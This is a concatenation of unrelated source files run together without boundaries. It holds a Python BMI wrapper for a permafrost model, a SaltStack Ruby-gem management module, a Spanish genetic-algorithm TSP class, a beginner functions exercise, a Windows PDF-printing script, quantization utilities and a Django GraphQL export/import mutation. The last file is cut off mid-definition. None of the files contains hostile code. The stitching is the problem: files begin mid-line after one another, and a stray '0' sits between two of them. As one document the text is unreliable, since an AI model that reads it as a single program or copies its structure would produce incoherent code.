n_lat = np.size(self._model.lat) n_lon = np.size(self._model.lon) n_time = self._model.end_year-self._model.start_year+1 self.output_alt = np.zeros((n_time,n_lat,n_lon))*np.nan; self.output_tps = np.zeros((n_time,n_lat,n_lon))*np.nan; # Verify that all input and output variable names are in the # variable name and the units map for varname in self._input_var_names: assert(varname in self._var_name_map) assert(varname in self._var_units_map) #print("Input var %s is in the name map and the units map"\ # % varname) for varname in self._output_var_names: assert(varname in self._var_name_map) assert(varname in self._var_units_map) self._model.cont = -1 gridnumber = 0 for varname in self._input_var_names: self._grids[gridnumber] = varname #self._grid_type[gridnumber] = 'uniform_rectilinear' self._grid_type[gridnumber] = 'scalar' gridnumber += 1 for varname in self._output_var_names: self._grids[gridnumber] = varname #self._grid_type[gridnumber] = 'uniform_rectilinear' self._grid_type[gridnumber] = 'scalar' gridnumber += 1 self._values = { # These are the links to the model's variables and # should be consistent with _var_name_map 'latitude': self._model.lat, 'longitude': self._model.lon, 'datetime__start': self._model.start_year, 'datetime__end': self._model.end_year, # 'atmosphere_bottom_air__temperature': "T_air", 'atmosphere_bottom_air__temperature': self._model.T_air, 'atmosphere_bottom_air__temperature_amplitude': self._model.A_air, 'snowpack__depth': self._model.h_snow, 'snowpack__density': self._model.rho_snow, 'water-liquid__volumetric-water-content-soil': self._model.vwc_H2O, 'vegetation__Hvgf': self._model.Hvgf, 'vegetation__Hvgt': self._model.Hvgt, 'vegetation__Dvf': self._model.Dvf, 'vegetation__Dvt': self._model.Dvt, 'soil__temperature': self._model.Tps, 'soil__active_layer_thickness': self._model.Zal} # Set the cfg file if it exists, otherwise, a default # if cfg_file==None: # # print self.cfg_file def get_attribute(self, att_name): try: return self._att_map[ att_name.lower() ] except: print('###################################################') print(' ERROR: Could not find attribute: ' + att_name) print('###################################################') print(' ') # get_attribute() #------------------------------------------------------------------- def get_input_var_names(self): #-------------------------------------------------------- # Note: These are currently variables needed from other # components vs. those read from files or GUI. 
#-------------------------------------------------------- return self._input_var_names # get_input_var_names() #------------------------------------------------------------------- def get_output_var_names(self): return self._output_var_names # get_output_var_names() #------------------------------------------------------------------- def get_var_name(self, long_var_name): return self._var_name_map[ long_var_name ] # get_var_name() #------------------------------------------------------------------- def get_var_units(self, long_var_name): return self._var_units_map[ long_var_name ] def get_var_location(self, long_var_name): return "node" def update(self): # self._model.update(self._model.dt) # Ensure that we've already initialized the run assert(self._model.status == 'initialized') # Calculate the new frost number values self._model.update_ground_temperatures() self._model.update_ALT() self._values['soil__active_layer_thickness'] = self._model.Zal self._values['soil__temperature'] = self._model.Tps # Update the time self._model.year += self._model.dt self._model.cont = self._model.cont + 1 # self.output_alt = np.append(self.output_alt, self._model.Zal) # self.output_tps = np.append(self.output_tps, self._model.Tps) self.output_alt[self._model.cont,:,:] = self._model.Zal self.output_tps[self._model.cont,:,:] = self._model.Tps # Get new input values self._model.read_input_files() def update_frac(self, time_fraction): time_step = self.get_time_step() self._model.dt = time_fraction * time_step self.update() self._model.dt = time_step def update_until(self, then): n_steps = (then - self.get_current_time()) / self.get_time_step() for _ in range(int(n_steps)): self.update() self.update_frac(n_steps - int(n_steps)) def finalize(self): SILENT = True # Finish with the run self._model.status = 'finalizing' # (OpenMI) # Close the input files self._model.close_input_files() # Close any input files # Write output last output self.save_grids() # Done finalizing self._model.status = 'finalized' # (OpenMI) def get_start_time(self): return 0.0 def get_current_time(self): return float(self._model.year - self._model.start_year) def get_end_time(self): return self._model.end_year - self._model.start_year + 1.0 # ---------------------------------- # Functions added to pass bmi-tester # ---------------------------------- def get_grid_type(self, grid_number): return self._grid_type[grid_number] def get_time_step(self): return self._model.dt # Note: get_value_ref() copied from bmi_heat.py def get_value_ref(self, var_name): """Reference to values. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- array_like Value array. """ return self._values[var_name] def set_value(self, var_name, new_var_values): setattr(self._model, self._var_name_map[var_name], new_var_values) # self._values[var_name] = new_var_values def set_value_at_indices(self, var_name, new_var_values, indices): self.get_value_ref(var_name).flat[indices] = new_var_values def get_var_itemsize(self, var_name): return np.asarray(self.get_value_ref(var_name)).flatten()[0].nbytes def get_value_at_indices(self, var_name, indices): return self.get_value_ref(var_name).take(indices) def get_var_nbytes(self, var_name): return np.asarray(self.get_value_ref(var_name)).nbytes def get_value(self, var_name, out=None): """Copy of values. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- array_like Copy of values. 
""" # Original version: from bmi_heat.py #return self.get_value_ref(var_name).copy() # Version to convert to numpy array for bmi-tester compliance # Note: converting to np arrays on the fly here # Note: float values don't have a copy() function #try: # return np.array(self.get_value_ref(var_name).copy()) #except AttributeError: # return np.array(self.get_value_ref(var_name)) if out is None: out = self.get_value_ref(var_name).copy() else: out[...] = self.get_value_ref(var_name) return out def get_var_type(self, var_name): """Data type of variable. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- str Data type. """ return str(self.get_value_ref(var_name).dtype) def get_component_name(self): return self._name # Copied from bmi_heat.py def get_var_grid(self, var_name): """Grid id for a variable. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- int Grid id. """ for grid_id, var_name_list in self._grids.items(): if var_name in var_name_list: return grid_id def get_grid_size(self, grid_id): """Size of grid. Parameters ---------- grid_id : int Identifier of a grid. Returns ------- int Size of grid. """ return 1 def get_grid_rank(self, var_id): """Rank of grid. Parameters ---------- grid_id : int Identifier of a grid. Returns ------- int Rank of grid. """ return 0 def save_grids(self): # Saves the grid values based on the prescribed ones in cfg file #if (self.SAVE_MR_GRIDS): # model_output.add_grid( self, self.T_air, 'T_air', self.time_min ) # self.ALT_file = self.out_directory + self.ALT_file try: assert self._model.SAVE_ALT_GRIDS except: print('NO OUTPUT of ALT') try: assert self._model.SAVE_TPS_GRIDS except: print('NO OUTPUT of TPS') if (self._model.SAVE_ALT_GRIDS): self._model.write_out_ncfile(self._model.ALT_file, self.output_alt) # self.TPS_file = self.out_directory + self.TPS_file if (self._model.SAVE_TPS_GRIDS): self._model.write_out_ncfile(self._model.TPS_file,self.output_tps) print("***") print("Writing output finished!") print("Please look at"+self._model.ALT_file+'.nc and '+self._model.TPS_file+'.nc') # -*- coding: utf-8 -*- ''' Manage ruby gems. ''' # Import python libs import re __func_alias__ = { 'list_': 'list' } def _gem(command, ruby=None, runas=None): cmdline = 'gem {command}'.format(command=command) if __salt__['rvm.is_installed'](runas=runas): return __salt__['rvm.do'](ruby, cmdline, runas=runas) if __salt__['rbenv.is_installed'](runas=runas): return __salt__['rbenv.do'](cmdline, runas=runas) ret = __salt__['cmd.run_all']( cmdline, runas=runas ) if ret['retcode'] == 0: return ret['stdout'] else: return False def install(gems, # pylint: disable=C0103 ruby=None, runas=None, version=None, rdoc=False, ri=False, pre_releases=False, proxy=None): # pylint: disable=C0103 ''' Installs one or several gems. gems The gems to install ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. version : None Specify the version to install for the gem. Doesn't play nice with multiple gems at once rdoc : False Generate RDoc documentation for the gem(s). ri : False Generate RI documentation for the gem(s). pre_releases Include pre-releases in the available versions proxy : None Use the specified HTTP proxy server for all outgoing traffic. Format: http://hostname[:port] CLI Example: .. 
code-block:: bash salt '*' gem.install vagrant ''' options = [] if version: options.append('--version {0}'.format(version)) if not rdoc: options.append('--no-rdoc') if not ri: options.append('--no-ri') if pre_releases: options.append('--pre') if proxy: options.append('-p {0}'.format(proxy)) cmdline_args = ' '.join(options) return _gem('install {gems} {options}'.format(gems=gems, options=cmdline_args), ruby, runas=runas) def uninstall(gems, ruby=None, runas=None): ''' Uninstall one or several gems. gems The gems to uninstall. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.uninstall vagrant ''' return _gem('uninstall {gems}'.format(gems=gems), ruby, runas=runas) def update(gems, ruby=None, runas=None): ''' Update one or several gems. gems The gems to update. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.update vagrant ''' return _gem('update {gems}'.format(gems=gems), ruby, runas=runas) def update_system(version='', ruby=None, runas=None): ''' Update rubygems. version : (newest) The version of rubygems to install. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.update_system ''' return _gem('update --system {version}'. format(version=version), ruby, runas=runas) def list_(prefix='', ruby=None, runas=None): ''' List locally installed gems. prefix : Only list gems when the name matches this prefix. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.list ''' gems = {} stdout = _gem('list {prefix}'.format(prefix=prefix), ruby, runas=runas) lines = [] if isinstance(stdout, str): lines = stdout.splitlines() for line in lines: match = re.match(r'^([^ ]+) \((.+)\)', line) if match: gem = match.group(1) versions = match.group(2).split(', ') gems[gem] = versions return gems def sources_add(source_uri, ruby=None, runas=None): ''' Add a gem source. source_uri The source URI to add. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.sources_add http://rubygems.org/ ''' return _gem('sources --add {source_uri}'. format(source_uri=source_uri), ruby, runas=runas) def sources_remove(source_uri, ruby=None, runas=None): ''' Remove a gem source. source_uri The source URI to remove. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.sources_remove http://rubygems.org/ ''' return _gem('sources --remove {source_uri}'. format(source_uri=source_uri), ruby, runas=runas) def sources_list(ruby=None, runas=None): ''' List the configured gem sources. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. 
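# A standalone sketch of the parsing done by list_() above: `gem list` prints
# one "name (version, version)" line per gem, and the same regex splits each
# line into a {name: [versions]} dict. The sample output below is illustrative
# so the snippet runs without gem/RVM/rbenv or Salt.
import re

sample_stdout = """bigdecimal (1.2.0)
bundler (2.1.4, 1.17.3)
rake (13.0.1)"""

gems = {}
for line in sample_stdout.splitlines():
    match = re.match(r'^([^ ]+) \((.+)\)', line)
    if match:
        gems[match.group(1)] = match.group(2).split(', ')

print(gems)  # {'bigdecimal': ['1.2.0'], 'bundler': ['2.1.4', '1.17.3'], 'rake': ['13.0.1']}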
code-block:: bash salt '*' gem.sources_list ''' ret = _gem('sources', ruby, runas=runas) return [] if ret is False else ret.splitlines()[2:] from dominio_ag import DominioAG from dominio_tsp import DominioTSP from datos import crear_datos import random import csv class DominioAGTSP(DominioAG, DominioTSP): """ Representa el objeto de dominio que conoce los detalles de implementación y modelamiento del problema del vendedor viajero para ser resuelto con algoritmos genéticos. Las soluciones se modelan como listas de enteros, donde cada número representa una ciudad específica. Si el grafo contiene n ciudades, la lista siempre contiene (n-1) elementos. La lista nunca contiene elementos repetidos y nunca contiene la ciudad de inicio y fin del circuito. Métodos: generar(n) Construye aleatoriamente una lista de listas que representa n posibles soluciones al problema. cruzar(sol_a, sol_b) Produce una nueva posible solución cruzando las dos soluciones dadas por parámetro. mutar(sol) Produce una nueva solución aplicando un ligero cambio a la solución dada por parámetro. """ def __init__(self, ciudades_rutacsv, ciudad_inicio): """Construye un objeto de modelo de dominio para una instancia específica del problema del vendedor viajero para ser resuelto con algoritmos genéticos. Entradas: ciudades_rutacsv (str) Ruta al archivo csv que contiene la matriz de pesos entre las ciudades para las que se quiere resolver el problema del vendedor viajero. ciudad_inicio (str) Nombre de la ciudad que será el inicio y fin del circuito a calcular. Salidas: Una instancia de DominioAGTSP correctamente inicializada. """ """self.matriz_ciudades, self.indice_ciudades_dicc = crear_datos(ciudades_rutacsv) self.n_ciudades = len(self.indice_ciudades_dicc) self.indice_ciudad_inicio = self.indice_ciudades_dicc[ciudad_inicio] self.ciudad_inicio = ciudad_inicio""" # self.ciudades, self.i_ciudades = crear_datos(ciudades_rutacsv) # self.n_ciudades = len(self.ciudades) # self.nombre_ciudad_inicio = ciudad_inicio # self.i_ciudad_inicio = self.i_ciudades[ciudad_inicio] mat=[] with open(ciudades_rutacsv, 'r') as file: reader = csv.reader(file) for row in reader: mat.append(row) self.matriz=mat self.ciudades_rutacsv=ciudades_rutacsv self.ciudad_inicio=ciudad_inicio def generar_n(self, n): """Construye aleatoriamente una lista de listas que representa n posibles soluciones al problema. Entradas: n (int) Número de soluciones aleatorias a generar. Salidas: (list) Lista que contiene n listas, cada una representando una posible solución al problema modelado por el objeto de dominio. """ sols = [] for x in range(n): nuevo = self.generar() valido = self.validar(nuevo) while(not valido): nuevo = self.generar() valido = self.validar(nuevo) sols.append(nuevo) return sols def cruzar(self, sol_a, sol_b): """Produce una nueva posible solución cruzando las dos soluciones dadas por parámetro. 
Entradas: sol_a (estructura de datos) Estructura de datos que modela la solución antecesora A que será cruzada con la B sol_b (estructura de datos) Estructura de datos que modela la solución antecesora B que será cruzada con la A Salidas: (estructura de datos) Una nueva solución producto del cruzamiento entre las soluciones A y B """ P1 = sol_a P2 = sol_b lenOri = len(sol_a) H1 = [-1] * lenOri geneA = 0 geneB = 0 while (geneA == geneB):#para que lo rango no sea igual a vacio geneA = int(random.random() * lenOri) geneB = int(random.random() * lenOri) startGene = min(geneA, geneB) endGene = max(geneA, geneB) for i in range(startGene, endGene): H1[i] = P1[i] rec = 0#recorrido del padre recorrido = 0#pos en la que va el nuevo elemento while (rec < lenOri): while (H1[recorrido] != -1 and recorrido + 1 < lenOri): recorrido += 1 if (P2[rec] not in H1): H1[recorrido] = P2[rec] rec += 1 return H1 def mutar(self, sol): """Produce una nueva solución aplicando un ligero cambio a la solución dada por parámetro. Entradas: sol (estructura de datos) La solución a mutar. Salidas: (estructura de datos) Una nueva solución que refleja un ligero cambio con respecto a la solución dada por parámetro """ return super().vecino(sol) # def indice_a_texto(self, sol): # sol_txt = [] # for indice in sol: # sol_txt.append(self.ciudades[indice]['km/min']) # return sol_txt# Funcions def print_hello(): print("Hello there") def greeting(name): print("Welcome, " + name) def greeting_dept(name,department): print("I'm " + name + " and I work at " + department) def area_triangle(base,height): return (base*height)/2 def convert_seconds(seconds): hours = seconds // 3600 minutes = (seconds - hours * 3600) // 60 remaining_seconds = seconds - hours * 3600 - minutes * 60 return hours, minutes , remaining_seconds print_hello() greeting("Emanuel") greeting("Carlos") greeting_dept("Emanuel","IT") greeting_dept("Carlos","Finance") area_a = area_triangle(5,4) area_b = area_triangle(7,3) print("area a: " + str(area_a)) print("area b: " + str(area_b)) hours, minutes , remaining_seconds = convert_seconds(50000) print("Hours: " + str(hours)) print("Minutes: " + str(minutes)) print("Remaining: " + str(remaining_seconds))#import win32print # impressora import win32printing import win32api import os from openpyxl import load_workbook class App2: def abrir_planilha_controle(self): self.caminho1 = r"C:\Users\andre.porto\Desktop\teste" self.caminho2 = r"C:\Users\andre.porto\Desktop\teste\pdf" # abrir planilha controle1 do excel planilha_nova = load_workbook(self.caminho1 + r'\controle.xlsx') self.celula = planilha_nova.active def configurar_impressora(self): # 2 é o valor padrão lista_impressoras = win32print.EnumPrinters(2) # exibe a lista de impressoras instaladas # print (lista_impressoras) # impressora n. 
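# A self-contained sketch of the crossover idea used by cruzar() above: copy a
# random slice from parent A into the child, then fill the remaining positions
# with parent B's genes in order, skipping duplicates. Names here are
# illustrative; only the logic mirrors the method above.
import random

def order_crossover(parent_a, parent_b, rng=random):
    n = len(parent_a)
    child = [None] * n
    i, j = sorted(rng.sample(range(n), 2))
    child[i:j] = parent_a[i:j]                        # keep a slice of parent A
    fill = [g for g in parent_b if g not in child]    # parent B order, no repeats
    for k in range(n):
        if child[k] is None:
            child[k] = fill.pop(0)
    return child

# Example: two permutations of cities 1..6 (city 0 assumed fixed as start/end).
print(order_crossover([1, 2, 3, 4, 5, 6], [6, 5, 4, 3, 2, 1]))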
4 # para escolha da impressora, # contagem de trás para frente impressora = lista_impressoras[4] # 2 É A CONFIGURAÇÃO PADRÃO win32printing.SetDefaultPrinter(impressora[2]) def imprimir_documentos(self): # criando uma lista com os arquivos obtidos dentro da pasta 'pdf' lista_de_arquivos = os.listdir(self.caminho2) c = 2 # iniciar na posição 2 da célula C b = 2 # iniciar na posição 2 da célula D for arquivo in lista_de_arquivos: if(int(self.celula[f'C{c}'].value) % 2 != 0): for _ in range(self.celula[f'B{b}'].value): win32api.ShellExecute( 0, "print", arquivo, None, self.caminho2, 0) else: print(f'Arquivo:{arquivo} -> par') win32api.ShellExecute(0, "open", arquivo, None, self.caminho2, 0) c += 1 b += 1 if __name__ == '__main__': aplicativo = App2() aplicativo.abrir_planilha_controle() aplicativo.configurar_impressora() aplicativo.imprimir_documentos() print(' FIM -> PROGRAMA FINALIZADO....AGUARDE IMPRESSÃO!!') # # For licensing see accompanying LICENSE file. # Copyright (C) 2021 Apple Inc. All Rights Reserved. # import collections import numbers from typing import Any from typing import Optional import numpy as np import torch from torch import autograd from torch import nn from .special_tensors import RepresentibleByQuantizeAffine from .special_tensors import tag_with_metadata QuantizeAffineParams2 = collections.namedtuple( "QuantizeAffineParams", ["scale", "zero_point", "num_bits"] ) INFINITY = 1e10 def _validate_tensor(tensor: torch.Tensor) -> None: if torch.isnan(tensor).any(): raise ValueError("Found NaN in the tensor.") if tensor.abs().max() > INFINITY: raise ValueError( "Tensor seems to be diverging. Found a value > {}".format(INFINITY) ) def get_quantized_representation( tensor: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: """Gets the quantize representation of a float @tensor. The resulting tensor will contain the quantized values and the quantization parameters will be tagged with the tensor as a special tensor. A ValueError will be raised if the given tensor contains NaN or divergent values. Arguments: tensor (torch.Tensor): The float torch tensor to quantize. quantize_params (QuantizeAffineParams): The quantization params to quantize the tensor by. """ _validate_tensor(tensor) scale = quantize_params.scale zero_point = quantize_params.zero_point num_bits = quantize_params.num_bits if scale == 0: # Special case, all elements are zeros. if zero_point != 0: raise ValueError( "The given QuantizeAffineParams (={}) has a non-zero zero point" " with a scale of 0.".format(quantize_params) ) quantized_tensor = torch.zeros_like(tensor) tag_with_metadata(quantized_tensor, quantize_params) return quantized_tensor qmin, qmax = get_qmin_qmax(num_bits) reciprocal = 1 / scale quantized_tensor = ((tensor * reciprocal).round_() + zero_point).clamp_( qmin, qmax ) tag_with_metadata(quantized_tensor, quantize_params) return quantized_tensor def mark_quantize_affine( tensor: torch.Tensor, scale: float, zero_point: int, dtype: np.dtype = np.uint8, ) -> None: """Mark a tensor as quantized with affine. Arguments: tensor (torch.Tensor): The tensor to be marked as affine-quantizable Tensor. scale (float): the scale (from quantization parameters). zero_point (int): The zero_point (from quantization parameters). dtype (numpy.dtype): Type of tensor when quantized (this is usually numpy.uint8, which is used for Q8). A ValueError will be thrown if the input dtype is not one of the following: {numpy.uint8, numpy.int32}. 
""" quant_params = QuantizeAffineParams2(scale, zero_point, dtype) tag_with_metadata(tensor, RepresentibleByQuantizeAffine(quant_params)) class QuantizeAffineFunction(autograd.Function): """Simulates affect of affine quantization during forward pass. This function simulates the affect of quantization and subsequent dequantization (in the forward pass only). Although the affine transformation results in a different basis (e.g. uint8), the output of this function will be a float Tensor representing that transformation (the dequantized Tensor). A ValueError will be raised if the input or resulting tensor contains NaN or divergent values. Arguments: input (Tensor): The input float Tensor to be quantized. quantize_params (quantize_affine_util.QuantizeAffineParams): The quantization parameter to quantize the input tensor by. """ @staticmethod def forward( ctx: Any, input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: quantized_tensor = get_quantized_representation(input, quantize_params) dequantized_tensor = dequantize(quantized_tensor, quantize_params) mark_quantize_affine( dequantized_tensor, quantize_params.scale, quantize_params.zero_point, quantize_params.num_bits, ) return dequantized_tensor @staticmethod def backward(ctx: Any, grad_output: Any) -> Any: """We will approximate the gradient as the identity""" return grad_output, None def quantize_affine_function_continuous( input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: quantized_tensor = get_quantized_representation(input, quantize_params) dequantized_tensor = dequantize(quantized_tensor, quantize_params) mark_quantize_affine( dequantized_tensor, quantize_params.scale, quantize_params.zero_point, quantize_params.num_bits, ) return dequantized_tensor def get_qmin_qmax(num_bits): return -(2 ** (num_bits - 1)), 2 ** (num_bits - 1) - 1 def get_quantization_params( rmin: float, rmax: float, num_bits: int = 8, ) -> QuantizeAffineParams2: """Returns QuantizeAffineParams for a data range [rmin, rmax]. The range must include 0 otherwise that's a failure. The scale and zero_point are picked such that the error is quantization error is minimized. Arguments: rmin (float): The data minimum point. Numbers smaller than rmin would not be representible by the quantized schema. rmax (float): The data maximum point. Numbers bigger than rmax would not be representible by the quantized schema. dtype (optional, np.dtype): The dtype that should be used to represent the individual numbers after quantization. Only np.uint8 is supported. """ if rmin > rmax: raise ValueError("Got rmin (={}) > rmax (={}).".format(rmin, rmax)) if rmin > 0 or rmax < 0: raise ValueError( "The data range ([{}, {}]) must always include " "0.".format(rmin, rmax) ) if rmin == rmax == 0.0: # Special case: all values are zero. return QuantizeAffineParams2(0, 0, num_bits) # Scale is floating point and is (rmax - rmin) / (qmax - qmin) to map the # length of the ranges. For zero_point, we solve the following equation: # rmin = (qmin - zero_point) * scale qmin, qmax = get_qmin_qmax(num_bits) scale = (rmax - rmin) / (qmax - qmin) zero_point = qmin - (rmin / scale) zero_point = np.clip(round(zero_point), qmin, qmax).astype(np.int32) quantize_params = QuantizeAffineParams2(scale, zero_point, num_bits) # We must ensure that zero is exactly representable with these quantization # parameters. This is easy enough to add a self-check for. 
quantized_zero = quantize(np.array([0.0]), quantize_params) dequantized_zero = dequantize(quantized_zero, quantize_params) if dequantized_zero.item() != 0.0: raise ValueError( f"Quantization parameters are invalid: scale={scale}, zero={zero_point}. " f"Can't exactly represent zero." ) return quantize_params def quantize_affine_given_quant_params( input: torch.Tensor, quantize_params: QuantizeAffineParams2, ) -> torch.Tensor: """Get a quantizable approximation of a float tensor given quantize param. This function does not quantize the float tensor @input, but only adjusts it such that the returned float tensor has an exact quantized representation. This is a function that we want to use at training time to quantize biases and other parameters whose quantization schema is enforced by other parameteres. In forward pass, this function is equivalent to dequantize(get_quantized_representation(input, quantize_param)) However, in backward pass, this function operates as identity, making it ideal to be a part of the training forward pass. """ return QuantizeAffineFunction.apply(input, quantize_params) def quantize( arr: np.ndarray, quantize_params: QuantizeAffineParams2 ) -> np.ndarray: """Quantize a floating point array with respect to the quantization params. Arguments: arr (np.ndarray): The floating point data to quantize. quantize_params (QuantizeAffineParams): The quantization parameters under which the data should be quantized. """ scale = quantize_params.scale zero_point = quantize_params.zero_point num_bits = quantize_params.num_bits if scale == 0: # Special case, all elements are zeros. if zero_point != 0: raise ValueError( "The given QuantizeAffineParams (={}) has a non-zero zero point" " with a scale of 0.".format(quantize_params) ) return np.zeros_like(arr, dtype=np.int32) qmin, qmax = get_qmin_qmax(num_bits) reciprocal = 1 / scale quantized_values = (arr * reciprocal).round() + zero_point quantized_values = quantized_values.clip(qmin, qmax) return quantized_values def dequantize( q_arr: np.ndarray, quantize_params: QuantizeAffineParams2, ) -> np.ndarray: """Dequantize a fixed point array with respect to the quantization params. Arguments: q_arr (np.ndarray): The quantized array to dequantize. It's dtype must match quantize_params. quantize_params (QuantizeAffineParams): The quantization parameters under which the data should be dequantized. """ zero_point = quantize_params.zero_point scale = quantize_params.scale return (q_arr - zero_point) * scale def quantize_affine( input: torch.Tensor, min_value: Optional[numbers.Real] = None, max_value: Optional[numbers.Real] = None, num_bits: int = None, ) -> torch.Tensor: """Return a quantizable approximation of a float tensor @input. This function does not quantize the float tensor @input, but only adjusts it such that the returned float tensor has an exact quantized representation. This is a function that we want to use at training time to quantize weights and activations. Arguments: input (Tensor): The input float Tensor to be quantized. min_value (scalar): The running min value (possibly averaged). max_value (scalar): The running max value (possibly averaged). num_bits (numpy.dtype): The number of bits. """ if num_bits is None: raise ValueError("num_bits must be supplied") if min_value is None: # Force include 0 in our calculation of min_value. min_value = min(input.min().item(), 0.0) if max_value is None: # Force include 0 in our calculation of max_value. 
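# A small numpy-only round trip illustrating the affine scheme used above:
# scale = (rmax - rmin) / (qmax - qmin), zero_point solved from
# rmin = (qmin - zero_point) * scale, quantize by round(x / scale) + zero_point
# clamped to [qmin, qmax], and dequantize by (q - zero_point) * scale. The
# input values are illustrative; this sketch does not call the module above.
import numpy as np

num_bits = 8
qmin, qmax = -(2 ** (num_bits - 1)), 2 ** (num_bits - 1) - 1   # -128, 127

x = np.array([-1.0, -0.25, 0.0, 0.5, 1.0])
rmin, rmax = min(x.min(), 0.0), max(x.max(), 0.0)              # force 0 into range

scale = (rmax - rmin) / (qmax - qmin)
zero_point = int(np.clip(round(qmin - rmin / scale), qmin, qmax))

q = np.clip(np.round(x / scale) + zero_point, qmin, qmax)
x_hat = (q - zero_point) * scale

print(q)                        # integer grid values in [-128, 127]
print(np.abs(x - x_hat).max())  # quantization error is roughly at most scale / 2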
max_value = max(input.max().item(), 0.0) quantize_params = get_quantization_params(min_value, max_value, num_bits) return QuantizeAffineFunction.apply(input, quantize_params) class QuantizeAffine(nn.Module): """Pytorch quantize_affine layer for quantizing layer outputs. This layer will keep a running max and min, which is used to compute a scale and zero_point for the quantization. Note that it is not always desirable to start the quantization immediately while training. Arguments: momentum (scalar): The amount of averaging of min and max bounds. This value should be in the range [0.0, 1.0]. iteration_delay (scalar): The number of batches to wait before starting to quantize. """ def __init__( self, momentum=0.1, iteration_delay=0, num_bits=8, quantizer_freeze_min_max=False, ): super().__init__() self.momentum = momentum self.iteration_delay = iteration_delay self.increment_counter = False self.num_bits = num_bits self.register_buffer("running_min_value", torch.tensor(0.0)) self.register_buffer("running_max_value", torch.tensor(0.0)) self.register_buffer( "iteration_count", torch.zeros([1], dtype=torch.int32).squeeze() ) self.quantizer_freeze_min_max = quantizer_freeze_min_max def __repr__(self): return ( f"{self.__class__.__name__}(running_min=" f"{self.running_min_value}, running_max=" f"{self.running_max_value}, freeze_min_max=" f"{self.quantizer_freeze_min_max}, num_bits={self.num_bits})" ) def update_num_bits(self, num_bits): self.num_bits = num_bits def forward(self, input, recomp_bn_stats=False, override_alpha=False): if ( self.training and self.is_active() and not self.quantizer_freeze_min_max ): # Force include 0 in min_value and max_value calculation. min_value = min(input.min().item(), 0) max_value = max(input.max().item(), 0) if self.iteration_count == self.iteration_delay: new_running_min_value = min_value new_running_max_value = max_value else: new_running_min_value = ( 1.0 - self.momentum ) * self.running_min_value.item() + self.momentum * min_value new_running_max_value = ( 1.0 - self.momentum ) * self.running_max_value.item() + self.momentum * max_value self.running_min_value.fill_(new_running_min_value) self.running_max_value.fill_(new_running_max_value) if self.is_active(): output = quantize_affine( input, self.running_min_value.item(), self.running_max_value.item(), self.num_bits, ) else: output = input if self.training and self.increment_counter: self.iteration_count.fill_(self.iteration_count.item() + 1) return output def is_active(self): if self.training: return self.iteration_count >= self.iteration_delay # If evaluating, always run quantization: return True 0 from uuid import uuid4 import graphene from django.core.files.uploadedfile import InMemoryUploadedFile from import_export.admin import ExportMixin, ImportMixin from main.core.exceptions import PermissionDenied from main.core.permissions import ProductPermissions from main.core.utils import build_absolute_uri from main.export_import.models import ExportObj from main.export_import.tasks import create_product_variant_export_file, \ product_variant_import from main.graphql.core.mutations import BaseMutation, ModelDeleteMutation from main.graphql.core.types import Upload from main.graphql.core.types.common import ProductError from main.graphql.core.utils import str_to_enum from main.graphql.export_import.types import ExportObjType from main.product.models import ProductVariant class ProductVariantExport(BaseMutation): url = graphene.String() class Arguments: file_format = graphene.Argument(graphene.Enum( 
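# The forward() above tracks the activation range with an exponential moving
# average of each batch's min and max (forcing 0 into the range); on the first
# active iteration it snaps directly to the raw batch statistics before the
# moving average kicks in. A tiny standalone version of the EMA update rule,
# with made-up batch values:
def update_running_range(running_min, running_max, batch, momentum=0.1):
    batch_min = min(min(batch), 0.0)
    batch_max = max(max(batch), 0.0)
    new_min = (1.0 - momentum) * running_min + momentum * batch_min
    new_max = (1.0 - momentum) * running_max + momentum * batch_max
    return new_min, new_max

rmin, rmax = 0.0, 0.0
for batch in ([-0.5, 1.2, 3.0], [-1.0, 0.4, 2.5], [-0.8, 0.9, 2.8]):
    rmin, rmax = update_running_range(rmin, rmax, batch)
print(rmin, rmax)   # drifts toward the typical batch min/max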
'FileFormatEnum', [(str_to_enum(f().get_title()), f().get_title()) for f in ExportMixin().get_export_formats()], ), required=False, description="File format (xlsx, json, csv...).", ) class Meta: description = "Export product variants." permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, root, info, **data): file_format = data.get('file_format', 'xlsx') file_url = str(uuid4()) url = build_absolute_uri(f"/download/{file_url}") export_obj = ExportObj.objects.create( file_url=file_url, model_name='ProductVariant', queryset=list(ProductVariant.objects.values_list('id', flat=True)) ) if ProductVariant.objects.count() < 10000: create_product_variant_export_file(export_obj.id, file_format) else: create_product_variant_export_file.delay(export_obj.id, file_format) return cls(url=url) class ExportObjDelete(ModelDeleteMutation): class Arguments: id = graphene.ID(required=True, description="ID of a export obj to delete.") class Meta: description = "Deletes an export object." model = ExportObj permissions = (ProductPermissions.MANAGE_PRODUCTS,) error_type_class = ProductError error_type_field = "product_errors" @classmethod def perform_mutation(cls, _root, info, **data): if not cls.check_permissions(info.context): raise PermissionDenied() node_id = data.get("id") instance = cls.get_node_or_error(info, node_id, only_type=ExportObjType) db_id = instance.id if instance.file: instance.file.delete() instance.delete() instance.id = db_id return cls.success_response(instance) FILE_FORMAT = { 'csv': 0, 'xls': 1, 'xlsx': 2, 'tsv': 3, 'json': 4, 'yaml': 5 } class ProductVariantImport(BaseMutation): class Arguments: file = Upload( required=True, description="Represents a file in a multipart request.", ) class Meta: description = ( 